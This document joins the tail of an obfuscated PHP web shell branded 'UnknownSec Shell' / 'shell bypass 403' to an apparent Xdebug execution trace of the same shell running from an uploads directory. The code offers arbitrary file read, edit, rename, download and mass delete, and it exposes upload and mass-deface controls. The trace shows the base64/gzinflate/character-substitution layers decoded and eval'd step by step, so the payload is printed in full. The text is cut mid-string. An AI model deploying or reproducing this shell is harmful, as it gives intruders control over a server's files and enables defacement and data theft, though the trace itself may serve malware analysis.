                                            $▟ = hapus_massal($dirc, $namafile);
                                        }
                                    }
                                }
                            }
                        }
                    }
                }
                if ($_POST['start']) {
                    hapus_massal($_POST['d_dir'], $_POST['d_file']);
                    echo "<br>";
                }
                echo "\r\n<div class='card text-dark'>\r\n\t<div class='card-header'>\r\n\t\t<form method='POST'>\r\n\t\t<kbd>{$_x}&nbsp;Mass delete</kbd>\r\n\t\t<br>\r\n\t\t<i class='bi bi-folder'></i> Lokasi:\r\n\t\t\t<input class='form-control btn-sm' type='text' name='d_dir' value='{$dir}'>\r\n\t\t\t\t<i class='bi bi-file-earmark'></i> Nama file:\r\n\t\t\t<div class='input-group mb-3'>\r\n\t\t\t\t<input class='form-control btn-sm' type='text' name='d_file' placeholder='nama file' {$_r}><br>\r\n\t\t\t<div class='input-group-append'>\r\n\t\t\t\t<input class='btn btn-dark btn-sm' type='submit' name='start' value='mass delete'>\r\n\t\t\t</div>\r\n\t\t</form>\r\n\t\t</div>\r\n\t</div>\r\n</div>\r\n<br>";
            }
        }
        // akhir tools
        if (isset($_GET['filesrc'])) {
            echo "<br><b>name : </b>" . basename($_GET['filesrc']);
            "</br>";
            echo '<div class="shell pre" id="see"><pre style="font-size:10px;">' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</pre></div><br/>';
        } elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
            echo '<br><b>name : </b>' . basename($_POST['path']);
            '</br>';
            //rename file
            if ($_POST['opt'] == 'rename') {
                if (isset($_POST['newname'])) {
                    if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
                        echo '<strong>Rename</strong> ok! ' . ok() . '</div>';
                    } else {
                        echo '<strong>Rename</strong> gagal! ' . er() . '</div>';
                    }
                    $_POST['name'] = $_POST['newname'];
                }
                echo '
<form method="POST">
	<div class="input-group mb-3">
		<input class="form-control form-control-sm" name="newname" type="text" value="' . $_POST['name'] . '" />
			<input type="hidden" name="path" value="' . $_POST['path'] . '">
		<input type="hidden" name="opt" value="rename">
		<input class="btn btn-outline-light btn-sm" type="submit" value="rename"/>
	</div>
</form>';
            } elseif ($_POST['opt'] == 'edit') {
                if (isset($_POST['src'])) {
                    $fp = fopen($_POST['path'], 'w');
                    if (fwrite($fp, $_POST['src'])) {
                        echo '<strong>Edit</strong> ok! ' . ok() . '</div>';
                    } else {
                        echo '<strong>Edit</strong> gagal! ' . er() . '</div>';
                    }
                    fclose($fp);
                }
                echo '
<form method="POST">
	<textarea class="form-control form-control-sm" rows="7" name="src">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea><br />
		<input type="hidden" name="path" value="' . $_POST['path'] . '">
		<input type="hidden" name="opt" value="edit">
	<input class="btn btn-outline-light btn-sm btn-block" type="submit" value="edit"/>
</form>
<br>';
            }
        } else {
            //delete dir & file
            if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
                if ($_POST['type'] == 'dir') {
                    if (rmdir($_POST['path'])) {
                        echo '<strong>Delete dir</strong> ok! ' . ok() . '</div>';
                    } else {
                        echo '<strong>Delete dir</strong> gagal! ' . er() . '</div>';
                    }
                } elseif ($_POST['type'] == 'file') {
                    if (unlink($_POST['path'])) {
                        echo '<strong>Delete file</strong> ok! ' . ok() . '</div>';
                    } else {
                        echo '<strong>Delete file</strong> gagal! ' . er() . '</div>';
                    }
                }
            }
            $scandir = scandir($path);
            $pa = getcwd();
            echo '<div class="table-responsive">
<table class="table table-hover table-dark text-light">
<thead>
<tr>
	<td class="text-center">name</td>
		<td class="text-center">last edit</td>
		<td class="text-center">size</td>
		<td class="text-center">owner<gr>:</gr>downer</td>
		<td class="text-center">permission</td>
	<td class="text-center">options</td>
</tr>
</thead>
<tbody class="text-nowrap">
<tr>
	<td><i class="bi bi-folder2-open"></i><a class="text-decoration-none text-secondary" href="?path=' . dirname($dir) . '">..</a></td><td></td><td></td><td></td><td></td><td class="text-center">
		<div class="btn-group">
			<a class="btn btn-outline-light btn-sm" href="?id=filebaru&path=' . $dir . '"><i class="bi bi-file-earmark-plus-fill"></i></a>
			<a class="btn btn-outline-light btn-sm" href="?id=dirbaru&path=' . $dir . '"><i class="bi bi-folder-plus"></i></a>
		</div>
	</td>
</tr>';
            foreach ($scandir as $dir) {
                $dt = date("Y-m-d H:i:s", filemtime("{$path}/{$dir}"));
                if (function_exists('posix_getpwuid')) {
                    $downer = @posix_getpwuid(fileowner("{$path}/{$dir}"));
                    $downer = $downer['name'];
                } else {
                    $downer = fileowner("{$path}/{$dir}");
                }
                if (function_exists('posix_getgrgid')) {
                    $dgrp = @posix_getgrgid(filegroup("{$path}/{$dir}"));
                    $dgrp = $dgrp['name'];
                } else {
                    $dgrp = filegroup("{$path}/{$dir}");
                }
                if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
                    continue;
                }
                echo "\r\n<tr>\r\n\t<td><i class='bi bi-folder-fill'></i><a class='text-decoration-none text-secondary' href=\"?path={$path}/{$dir}\">{$dir}</a></td>\r\n\t<td class='text-center'>{$dt}</td>\r\n\t<td class='text-center'>dir</td>\r\n\t<td class='text-center'>{$downer}<gr>:</gr>{$dgrp}</td>\r\n\t<td class='text-center'>";
                if (is_writable("{$path}/{$dir}")) {
                    echo "<gr>";
                } elseif (!is_readable("{$path}/{$dir}")) {
                    echo "<rd>";
                }
                echo p("{$path}/{$dir}");
                if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
                    echo "</gr></rd></td>";
                }
                echo "\r\n\t<td class=\"text-center\">\r\n\t<form method=\"POST\" action=\"?option&path={$path}\">\r\n\t\t<div class=\"btn-group\">\r\n\t\t\t<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"rename\"><i class='bi bi-pencil-fill'></i></button>\r\n\t\t\t<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"delete\"><i class='bi bi-trash-fill'></i></button>\r\n\t\t</div>\r\n\t\t<input type=\"hidden\" name=\"type\" value=\"dir\">\r\n\t\t<input type=\"hidden\" name=\"name\" value=\"{$dir}\">\r\n\t\t<input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\">\r\n\t</form>\r\n\t</td>\r\n</tr>";
            }
            foreach ($scandir as $file) {
                $ft = date("Y-m-d H:i:s", filemtime("{$path}/{$file}"));
                if (!is_file($path . '/' . $file)) {
                    continue;
                }
                if (function_exists('posix_getpwuid')) {
                    $fowner = @posix_getpwuid(fileowner("{$path}/{$file}"));
                    $fowner = $fowner['name'];
                } else {
                    $fowner = fileowner("{$path}/{$file}");
                }
                if (function_exists('posix_getgrgid')) {
                    $fgrp = @posix_getgrgid(filegroup("{$path}/{$file}"));
                    $fgrp = $fgrp['name'];
                } else {
                    $fgrp = filegroup("{$path}/{$file}");
                }
                echo "\r\n<tr>\r\n\t<td><i class='bi bi-file-earmark-code-fill'></i><a class='text-decoration-none text-secondary' href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a></td>\r\n\t<td class='text-center'>{$ft}</td>\r\n\t<td class='text-center'>" . sz(filesize($file)) . "</td>\r\n\t<td class='text-center'>{$fowner}<gr>:</gr>{$fgrp}</td>\r\n\t<td class='text-center'>";
                if (is_writable("{$path}/{$file}")) {
                    echo "<gr>";
                } elseif (!is_readable("{$path}/{$file}")) {
                    echo "<rd>";
                }
                echo p("{$path}/{$file}");
                if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
                    echo "</gr></rd></td>";
                }
                echo "\r\n\t<td class=\"text-center\">\r\n\t\t<form method=\"POST\" action=\"?option&path={$path}\">\r\n\t\t\t<div class=\"btn-group\">\r\n\t\t\t\t<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"edit\"><i class='bi bi-pencil-square'></i></button>\r\n\t\t\t\t<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"rename\"><i class='bi bi-pencil-fill'></i></button>\r\n\t\t\t\t<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"download\"><i class='bi bi-download'></i></button>\r\n\t\t\t\t<button class=\"btn btn-outline-light btn-sm\" name=\"opt\" value=\"delete\"><i class='bi bi-trash-fill'></i></button>\r\n\t\t\t</div>\r\n\t\t\t<input type=\"hidden\" name=\"type\" value=\"file\">\r\n\t\t\t<input type=\"hidden\" name=\"name\" value=\"{$file}\">\r\n\t\t\t<input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\">\r\n\t\t</form>\r\n\t</td>\r\n</tr>";
            }
        }
        echo "\r\n</tbody>\r\n</table>\r\n<div class='text-secondary'>&copy; " . date("Y") . " {$_n}</div>\r\n</div>\r\n</div>\r\n</body>\r\n</html>";
    };
};
$STOP = "kucx4B8RPsGUEFGamUySB40kx7HHsXdjj2E7+zawZgWIgAR4KILhRTNO/H7GO+zl/Yr+QXwC+kBCBx761DCwVdVNsklRHzPjrHdtYESxq6uqu+u7u3X/XipiOU7lVCy9eBwnc/kh8uWYy7hpP+KJ6P6buBRhLOzW6f17jbHPBsz+xb/0o4X/Rro2veTw0urz+NqTw1hM";

Execution traces

data/traces/2574897d64a05bc06d31cbcde065c6f2_trace-1676251914.5774.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:32:20.475170]
1	0	1	0.000129	393576
1	3	0	0.000234	405688	{main}	1		/var/www/html/uploads/en_bypass403.php	0	0
2	4	0	0.000251	405688	set_time_limit	0		/var/www/html/uploads/en_bypass403.php	3	1	0
2	4	1	0.000268	405752
2	4	R			FALSE
2	5	0	0.000282	405720	error_reporting	0		/var/www/html/uploads/en_bypass403.php	4	1	0
2	5	1	0.000295	405760
2	5	R			22527
2	6	0	0.000309	405720	ini_set	0		/var/www/html/uploads/en_bypass403.php	5	2	'error_log'	NULL
2	6	1	0.000324	405792
2	6	R			''
2	7	0	0.000337	405720	ini_set	0		/var/www/html/uploads/en_bypass403.php	6	2	'log_errors'	0
2	7	1	0.000351	405792
2	7	R			'1'
2	8	0	0.000364	405720	ini_set	0		/var/www/html/uploads/en_bypass403.php	7	2	'max_execution_time'	0
2	8	1	0.000378	405760
2	8	R			'0'
2	9	0	0.000390	405688	ini_set	0		/var/www/html/uploads/en_bypass403.php	8	2	'output_buffering'	0
2	9	1	0.000404	405760
2	9	R			FALSE
2	10	0	0.000417	405688	ini_set	0		/var/www/html/uploads/en_bypass403.php	9	2	'display_errors'	0
2	10	1	0.000431	405760
2	10	R			''
1		A						/var/www/html/uploads/en_bypass403.php	10	$SISTEMIT_COM_ENC = '1TxNj9vGkucx4B8RPsGUEFGamUySB40kx7HHsXdjj2E7+zawZgWIgAR4KILhRTNO/H7GO+zl/Yr+QXwC+kBCBx761DCwVdVNsklRHzPjrHdtYESxq6uqu+u7u3X/XipiOU7lVCy9eBwnc/kh8uWYy7hpP+KJ6P6buBRhLOzW6f17jbHPBsz+xb/0o4X/Rro2veTw0urz+NqTw1hMPPl7mvDAE9c9H3Cdfux3VVs/TT4x1xOcD2yCc0LJg8jnySdpD/urcNjvAsjQIqwhYg3lb8sklOnAzp5s1XpFNJMM3SRhk8SZSRE608TzAFs3ITzJtJlwHE1j/NPZ23d2FMRJ5NsXLfbgAWuMX52/US/tCzaAoaUwLi8Sqd36/f69g5UUqQyb9uPIj6UfO/F1IHsslldxF4aX+DQpa1BPYPART5BOj4k4Fu5qDu9PGXAmfTGXA8vuZKTxu33RsS3CJd1V1ESw8UzGY1ch5M0MOBDxClgnyKskbuLDx/v3pkvfRWrs'
2	11	0	0.000473	405688	base64_decode	0		/var/www/html/uploads/en_bypass403.php	10	1	'Skc1aGRpQTlJR2Q2YVc1bWJHRjBaU2hpWVhObE5qUmZaR1ZqYjJSbEtDUlRTVk5VUlUxSlZGOURUMDFmUlU1REtTazdEUW9KQ1Fra2MzUnlJRDBnV3lmMUp5d242eWNzSitNbkxDZjdKeXduNFNjc0ovRW5MQ2ZtSnl3bjdTY3NKLzBuTENmcUp5d250U2RkT3cwS0NRa0pKSEp3YkdNZ1BWc25ZU2NzSjJrbkxDZDFKeXduWlNjc0oyOG5MQ2RrSnl3bmN5Y3NKMmduTENkMkp5d25kQ2NzSnlBblhUc05DZ2tKSUNBZ0lDUnVZWFlnUFNCemRISmZjbVZ3YkdGalpTZ2tjM1J5TENSeWNHeGpMQ1J1WVhZcE93MEtDUWtKWlhaaGJDZ2tibUYyS1RzPQ=='
2	11	1	0.000498	406168
2	11	R			'JG5hdiA9IGd6aW5mbGF0ZShiYXNlNjRfZGVjb2RlKCRTSVNURU1JVF9DT01fRU5DKSk7DQoJCQkkc3RyID0gWyf1Jywn6ycsJ+MnLCf7Jywn4ScsJ/EnLCfmJywn7ScsJ/0nLCfqJywntSddOw0KCQkJJHJwbGMgPVsnYScsJ2knLCd1JywnZScsJ28nLCdkJywncycsJ2gnLCd2JywndCcsJyAnXTsNCgkJICAgICRuYXYgPSBzdHJfcmVwbGFjZSgkc3RyLCRycGxjLCRuYXYpOw0KCQkJZXZhbCgkbmF2KTs='
1		A						/var/www/html/uploads/en_bypass403.php	10	$rand = 'JG5hdiA9IGd6aW5mbGF0ZShiYXNlNjRfZGVjb2RlKCRTSVNURU1JVF9DT01fRU5DKSk7DQoJCQkkc3RyID0gWyf1Jywn6ycsJ+MnLCf7Jywn4ScsJ/EnLCfmJywn7ScsJ/0nLCfqJywntSddOw0KCQkJJHJwbGMgPVsnYScsJ2knLCd1JywnZScsJ28nLCdkJywncycsJ2gnLCd2JywndCcsJyAnXTsNCgkJICAgICRuYXYgPSBzdHJfcmVwbGFjZSgkc3RyLCRycGxjLCRuYXYpOw0KCQkJZXZhbCgkbmF2KTs='
2	12	0	0.000548	406136	base64_decode	0		/var/www/html/uploads/en_bypass403.php	10	1	'JG5hdiA9IGd6aW5mbGF0ZShiYXNlNjRfZGVjb2RlKCRTSVNURU1JVF9DT01fRU5DKSk7DQoJCQkkc3RyID0gWyf1Jywn6ycsJ+MnLCf7Jywn4ScsJ/EnLCfmJywn7ScsJ/0nLCfqJywntSddOw0KCQkJJHJwbGMgPVsnYScsJ2knLCd1JywnZScsJ28nLCdkJywncycsJ2gnLCd2JywndCcsJyAnXTsNCgkJICAgICRuYXYgPSBzdHJfcmVwbGFjZSgkc3RyLCRycGxjLCRuYXYpOw0KCQkJZXZhbCgkbmF2KTs='
2	12	1	0.000571	406552
2	12	R			'$nav = gzinflate(base64_decode($SISTEMIT_COM_ENC));\r\n\t\t\t$str = [\'�\',\'�\',\'�\',\'�\',\'�\',\'�\',\'�\',\'�\',\'�\',\'�\',\'�\'];\r\n\t\t\t$rplc =[\'a\',\'i\',\'u\',\'e\',\'o\',\'d\',\'s\',\'h\',\'v\',\'t\',\' \'];\r\n\t\t    $nav = str_replace($str,$rplc,$nav);\r\n\t\t\teval($nav);'
2	13	0	0.000619	410256	eval	1	'$nav = gzinflate(base64_decode($SISTEMIT_COM_ENC));\r\n\t\t\t$str = [\'�\',\'�\',\'�\',\'�\',\'�\',\'�\',\'�\',\'�\',\'�\',\'�\',\'�\'];\r\n\t\t\t$rplc =[\'a\',\'i\',\'u\',\'e\',\'o\',\'d\',\'s\',\'h\',\'v\',\'t\',\' \'];\r\n\t\t    $nav = str_replace($str,$rplc,$nav);\r\n\t\t\teval($nav);'	/var/www/html/uploads/en_bypass403.php	10	0
3	14	0	0.000644	410256	base64_decode	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code	1	1	'1TxNj9vGkucx4B8RPsGUEFGamUySB40kx7HHsXdjj2E7+zawZgWIgAR4KILhRTNO/H7GO+zl/Yr+QXwC+kBCBx761DCwVdVNsklRHzPjrHdtYESxq6uqu+u7u3X/XipiOU7lVCy9eBwnc/kh8uWYy7hpP+KJ6P6buBRhLOzW6f17jbHPBsz+xb/0o4X/Rro2veTw0urz+NqTw1hMPPl7mvDAE9c9H3Cdfux3VVs/TT4x1xOcD2yCc0LJg8jnySdpD/urcNjvAsjQIqwhYg3lb8sklOnAzp5s1XpFNJMM3SRhk8SZSRE608TzAFs3ITzJtJlwHE1j/NPZ23d2FMRJ5NsXLfbgAWuMX52/US/tCzaAoaUwLi8Sqd36/f69g5UUqQyb9uPIj6UfO/F1IHsslldxF4aX+DQpa1BPYPART5BOj4k4Fu5qDu9PGXAmfTGXA8vuZKTxu33RsS3CJd1V1ESw8UzGY1ch5M0MOBDxClgnyKskbuLDx/v3pkvfRWrs'
3	14	1	0.000689	418480
3	14	R			'�<M��ƒ�1�\037\021>��\020Q��L�\a�$DZDZwc�a;�6�f\005��\004x(��E3N�~�;���A|\002�@B\a\036��0�U�M�IQ\0373�wm`D�����뻻u�^*b9N�T,�x\034\'s�!��˸i?���\024a,���{���\006�ſ�F�6������ړ�XL<�{��\023�=\037p�~�wU[?M>1�\023�\017l�sBɃ���\'i\017��p��\002��"�!b\r�o�$��Ξl�zE4�\f�$a�ęI\021:���\000[7!<ɴ�p\034Mc����wv\024�I��\027-��\001k�_��Q/�\v6���0./\022�������\024�\f���ȏ�\037;�u {,�Wq\027���4)kPO`�\021O�N��8\026�j\016�O\031p&}1�\003��d��}ѱ-�%�U�D��L�cW!��\f8\020�\nX\'ȫ$n�����K�Ej�_��g��&a�\021����'
3	15	0	0.000954	418448	gzinflate	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code	1	1	'�<M��ƒ�1�\037\021>��\020Q��L�\a�$DZDZwc�a;�6�f\005��\004x(��E3N�~�;���A|\002�@B\a\036��0�U�M�IQ\0373�wm`D�����뻻u�^*b9N�T,�x\034\'s�!��˸i?���\024a,���{���\006�ſ�F�6������ړ�XL<�{��\023�=\037p�~�wU[?M>1�\023�\017l�sBɃ���\'i\017��p��\002��"�!b\r�o�$��Ξl�zE4�\f�$a�ęI\021:���\000[7!<ɴ�p\034Mc����wv\024�I��\027-��\001k�_��Q/�\v6���0./\022�������\024�\f���ȏ�\037;�u {,�Wq\027���4)kPO`�\021O�N��8\026�j\016�O\031p&}1�\003��d��}ѱ-�%�U�D��L�cW!��\f8\020�\nX\'ȫ$n�����K�Ej�_��g��&a�\021����'
3	15	1	0.001167	443056
3	15	R			'\r\n��_�f��l�_��m�z�n�_��(\'A��/J�k�r�\');\r\n$_n�=�\'Unkn�wnS�c\';\r\n$_�=�"<��yl�>�bl�{���pl�y:n�n�;}</��yl�><��cl���=\'�bl�-r��p�n��\'><�r></��>";\r\n$_r�=�"r�q��r��=\'r�q��r��\'";\r\n$_x�=�"<�cl���=\'b�b�-g��r-f�ll\'></�>";\r\n�f(����($_GET[\'�p���n\'])�&&�$_POST[\'�p�\']�==�\'��wnl��\'){\r\n\t��r(\'C�n�n�-�yp�:��x�/pl��n\');\r\n\t��r(\'C�n�n�-D��p������n:����c�m�n�;�f�l�n�m�="\'.$_POST[\'n�m�\'].\'"\');\r\n�c��(f�l�_g��_c�n�n��($_POST[\'p���\']));\r\n�x��();\r\n}\r\nf�nc���'
2		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code	1	$nav = '\r\n��_�f��l�_��m�z�n�_��(\'A��/J�k�r�\');\r\n$_n�=�\'Unkn�wnS�c\';\r\n$_�=�"<��yl�>�bl�{���pl�y:n�n�;}</��yl�><��cl���=\'�bl�-r��p�n��\'><�r></��>";\r\n$_r�=�"r�q��r��=\'r�q��r��\'";\r\n$_x�=�"<�cl���=\'b�b�-g��r-f�ll\'></�>";\r\n�f(����($_GET[\'�p���n\'])�&&�$_POST[\'�p�\']�==�\'��wnl��\'){\r\n\t��r(\'C�n�n�-�yp�:��x�/pl��n\');\r\n\t��r(\'C�n�n�-D��p������n:����c�m�n�;�f�l�n�m�="\'.$_POST[\'n�m�\'].\'"\');\r\n�c��(f�l�_g��_c�n�n��($_POST[\'p���\']));\r\n�x��();\r\n}\r\nf�nc���'
2		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code	2	$str = [0 => '�', 1 => '�', 2 => '�', 3 => '�', 4 => '�', 5 => '�', 6 => '�', 7 => '�', 8 => '�', 9 => '�', 10 => '�']
2		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code	3	$rplc = [0 => 'a', 1 => 'i', 2 => 'u', 3 => 'e', 4 => 'o', 5 => 'd', 6 => 's', 7 => 'h', 8 => 'v', 9 => 't', 10 => ' ']
3	16	0	0.001360	434832	str_replace	0		/var/www/html/uploads/en_bypass403.php(10) : eval()'d code	4	3	[0 => '�', 1 => '�', 2 => '�', 3 => '�', 4 => '�', 5 => '�', 6 => '�', 7 => '�', 8 => '�', 9 => '�', 10 => '�']	[0 => 'a', 1 => 'i', 2 => 'u', 3 => 'e', 4 => 'o', 5 => 'd', 6 => 's', 7 => 'h', 8 => 'v', 9 => 't', 10 => ' ']	'\r\n��_�f��l�_��m�z�n�_��(\'A��/J�k�r�\');\r\n$_n�=�\'Unkn�wnS�c\';\r\n$_�=�"<��yl�>�bl�{���pl�y:n�n�;}</��yl�><��cl���=\'�bl�-r��p�n��\'><�r></��>";\r\n$_r�=�"r�q��r��=\'r�q��r��\'";\r\n$_x�=�"<�cl���=\'b�b�-g��r-f�ll\'></�>";\r\n�f(����($_GET[\'�p���n\'])�&&�$_POST[\'�p�\']�==�\'��wnl��\'){\r\n\t��r(\'C�n�n�-�yp�:��x�/pl��n\');\r\n\t��r(\'C�n�n�-D��p������n:����c�m�n�;�f�l�n�m�="\'.$_POST[\'n�m�\'].\'"\');\r\n�c��(f�l�_g��_c�n�n��($_POST[\'p���\']));\r\n�x��();\r\n}\r\nf�nc���'
3	16	1	0.001902	459504
3	16	R			'\r\ndate_default_timezone_set(\'Asia/Jakarta\');\r\n$_n = \'UnknownSec\';\r\n$_s = "<style>table{display:none;}</style><div class=\'table-responsive\'><hr></div>";\r\n$_r = "required=\'required\'";\r\n$_x = "<i class=\'bi bi-gear-fill\'></i>";\r\nif(isset($_GET[\'option\']) && $_POST[\'opt\'] == \'download\'){\r\n\theader(\'Content-type: text/plain\');\r\n\theader(\'Content-Disposition: attachment; filename="\'.$_POST[\'name\'].\'"\');\r\necho(file_get_contents($_POST[\'path\']));\r\nexit();\r\n}\r\nfunctio'
2		A						/var/www/html/uploads/en_bypass403.php(10) : eval()'d code	4	$nav = '\r\ndate_default_timezone_set(\'Asia/Jakarta\');\r\n$_n = \'UnknownSec\';\r\n$_s = "<style>table{display:none;}</style><div class=\'table-responsive\'><hr></div>";\r\n$_r = "required=\'required\'";\r\n$_x = "<i class=\'bi bi-gear-fill\'></i>";\r\nif(isset($_GET[\'option\']) && $_POST[\'opt\'] == \'download\'){\r\n\theader(\'Content-type: text/plain\');\r\n\theader(\'Content-Disposition: attachment; filename="\'.$_POST[\'name\'].\'"\');\r\necho(file_get_contents($_POST[\'path\']));\r\nexit();\r\n}\r\nfunctio'
3	17	0	0.002608	584656	eval	1	'\r\ndate_default_timezone_set(\'Asia/Jakarta\');\r\n$_n = \'UnknownSec\';\r\n$_s = "<style>table{display:none;}</style><div class=\'table-responsive\'><hr></div>";\r\n$_r = "required=\'required\'";\r\n$_x = "<i class=\'bi bi-gear-fill\'></i>";\r\nif(isset($_GET[\'option\']) && $_POST[\'opt\'] == \'download\'){\r\n\theader(\'Content-type: text/plain\');\r\n\theader(\'Content-Disposition: attachment; filename="\'.$_POST[\'name\'].\'"\');\r\necho(file_get_contents($_POST[\'path\']));\r\nexit();\r\n}\r\nfunction ▟($dir,$p) {\r\nif(isset($_GET[\'path\'])) {\r\n\t$▚ = $_GET[\'path\'];\r\n} else {\r\n\t$▚ = getcwd();\r\n}\r\nif(is_writable($▚)) {\r\n\treturn "<gr>".$p."</gr>";\r\n} else {\r\n\treturn "<rd>".$p."</rd>";\r\n\t}\r\n}\r\nfunction ok(){\r\n\techo \'<div class="alert alert-success alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>\';\r\n}\r\nfunction er(){\r\n\techo \'<div class="alert alert-danger alert-dismissible fade show my-3" role="alert"><button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>\';\r\n}\r\nfunction sz($byt){\r\n\t$sz = array(\'B\', \'KB\', \'MB\', \'GB\', \'TB\');\r\n\tfor($i = 0; $byt >= 1024 && $i < (count($sz) -1 ); $byt /= 1024, $i++ );\r\n\treturn(round($byt,2)." ".$sz[$i]);\r\n}\r\nfunction ip() {\r\n\t$ipas = \'\';\r\nif(getenv(\'HTTP_CLIENT_IP\'))\r\n\t$ipas = getenv(\'HTTP_CLIENT_IP\');\r\nelse if(getenv(\'HTTP_X_FORWARDED_FOR\'))\r\n\t$ipas = getenv(\'HTTP_X_FORWARDED_FOR\');\r\nelse if(getenv(\'HTTP_X_FORWARDED\'))\r\n\t$ipas = getenv(\'HTTP_X_FORWARDED\');\r\nelse if(getenv(\'HTTP_FORWARDED_FOR\'))\r\n\t$ipas = getenv(\'HTTP_FORWARDED_FOR\');\r\nelse if(getenv(\'HTTP_FORWARDED\'))\r\n\t$ipas = getenv(\'HTTP_FORWARDED\');\r\nelse if(getenv(\'REMOTE_ADDR\'))\r\n\t$ipas = getenv(\'REMOTE_ADDR\');\r\nelse\r\n\t$ipas = \'IP tidak dikenali\';\r\nreturn $ipas;\r\n}\r\nfunction p($file){\r\nif($p = @fileperms($file)){\r\n\t$i = \'u\';\r\nif(($p & 0xC000) == 0xC000)$i = \'s\';\r\nelseif(($p & 0xA000) == 0xA000)$i = \'l\';\r\nelseif(($p & 0x8000) == 0x8000)$i = \'-\';\r\nelseif(($p & 0x6000) == 0x6000)$i = \'b\';\r\nelseif(($p & 0x4000) == 0x4000)$i = \'d\';\r\nelseif(($p & 0x2000) == 0x2000)$i = \'c\';\r\nelseif(($p & 0x1000) == 0x1000)$i = \'p\';\r\n\t$i .= ($p & 00400)? \'r\':\'-\';\r\n\t$i .= ($p & 00200)? \'w\':\'-\';\r\n\t$i .= ($p & 00100)? \'x\':\'-\';\r\n\t$i .= ($p & 00040)? \'r\':\'-\';\r\n\t$i .= ($p & 00020)? \'w\':\'-\';\r\n\t$i .= ($p & 00010)? \'x\':\'-\';\r\n\t$i .= ($p & 00004)? \'r\':\'-\';\r\n\t$i .= ($p & 00002)? \'w\':\'-\';\r\n\t$i .= ($p & 00001)? \'x\':\'-\';\r\nreturn $i;\r\n\t}\r\n\telse return "- ?? -";\r\n}\r\necho "\r\n<!DOCTYPE HTML>\r\n<html>\r\n\t<head>\r\n\t\t<meta name=\'author\' content=\'$_n\'>\r\n\t\t<meta name=\'robots\' content=\'noindex,nofollow\'>\r\n\t\t<title>".$_SERVER[\'HTTP_HOST\']." - $_n</title>\r\n\t\t<meta name=\'viewport\' content=\'width=device-width, initial-scale=0.70\'>\r\n\t\t<link rel=\'stylesheet\' href=\'//random-php.ftp.sh/style.css\'>\r\n\t\t<script src=\'//cdnjs.cloudflare.com/ajax/libs/prism/1.6.0/prism.js\'></script>\r\n\t\t<script src=\'//cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js\'></script>\r\n\t\t<script src=\'//code.jquery.com/jquery-3.3.1.slim.min.js\'></script>\r\n\t</head>\r\n<style>\r\n.shell {\r\n\tborder-radius: 4px;\r\n\tborder: 1px solid rgba(255, 255, 255, 0.4);\r\n\tfont-size: 10pt;\r\n\tdisplay: flex;\r\n\tflex-direction: column;\r\n\talign-items: stretch;\r\n\tbackground: #242424;\r\n\tcolor: #fff;\r\n}\r\n.pre {\r\n\theight: 500px;\r\n\toverflow: auto;\r\n\twhite-space: pre-wrap;\r\n\tflex-grow: 1;\r\n\tmargin:10px auto;\r\n\tpadding:10px;\r\n\tline-height:1.3em;\r\n\toverflow-x:scroll;\r\n}\r\n</style>\r\n<body class=\'bg-secondary text-light\'>\r\n<div class=\'container-fluid\'>\r\n\t<div class=\'py-3\' id=\'main\'>\r\n\t\t<div class=\'box shadow bg-dark p-4 rounded-3\'>\r\n\t\t\t<div class=\'corner text-secondary\'>shell bypass 403</div>\r\n\t\t\t\t<a class=\'text-decoration-none text-light\' href=\'".$_SERVER[\'PHP_SELF\']."\'><h4>$_n Shell</h4></a>";\r\n\t\t\t\tif(isset($_GET[\'path\'])){\r\n\t\t\t\t\t$path = $_GET[\'path\'];\r\n\t\t\t\t} else {\r\n\t\t\t\t\t$path = getcwd();\r\n\t\t\t\t}\r\n\t\t\t\t\t$path = str_replace(\'\\\\\',\'/\',$path);\r\n\t\t\t\t\t$paths = explode(\'/\',$path);\r\n\t\t\t\tforeach($paths as $id=>$pat){\r\n\t\t\t\tif($pat == \'\' && $id == 0){\r\n\t\t\t\t\t$a = true;\r\n\t\t\t\t\techo \'<div class="table-responsive"><i class="bi bi-hdd-rack"></i> : <a class="text-decoration-none text-light" href="?path=/">/</a>\';\r\n\t\t\t\tcontinue;\r\n\t\t\t\t}\r\n\t\t\t\tif($pat == \'\') continue;\r\n\t\t\t\t\techo \'<a class="text-decoration-none" href="?path=\';\r\n\t\t\t\tfor($i=0;$i<=$id;$i++){\r\n\t\t\t\t\techo "$paths[$i]";\r\n\t\t\t\tif($i != $id) echo "/";\r\n\t\t\t\t}\r\n\t\t\t\techo \'">\'.$pat.\'</a>/\';\r\n\t\t\t\t}\r\n\t\t\t\techo " [ ".▟($path, p($path))." ]</div>";\r\n\t\t\techo "\r\n\t\t</div>\r\n\t</div>\r\n</div>\r\n<div class=\'container-fluid\'>\r\n\t<div class=\'box shadow bg-dark p-4 rounded-3\'>\r\n\t\t<div class=\'text-center\'>\r\n\t\t\t<a class=\'btn btn-outline-light btn-sm\' href=\'?id=upload&path=$path\'><i class=\'bi bi-upload\'></i> upload</a>\r\n\t\t\t<a class=\'btn btn-outline-light btn-sm\' href=\'?id=deface&path=$path\'><i class=\'bi bi-exclamation-diamond\'></i> mass deface</a>\r\n\t\t\t<a class=\'btn btn-outline-light btn-sm\' 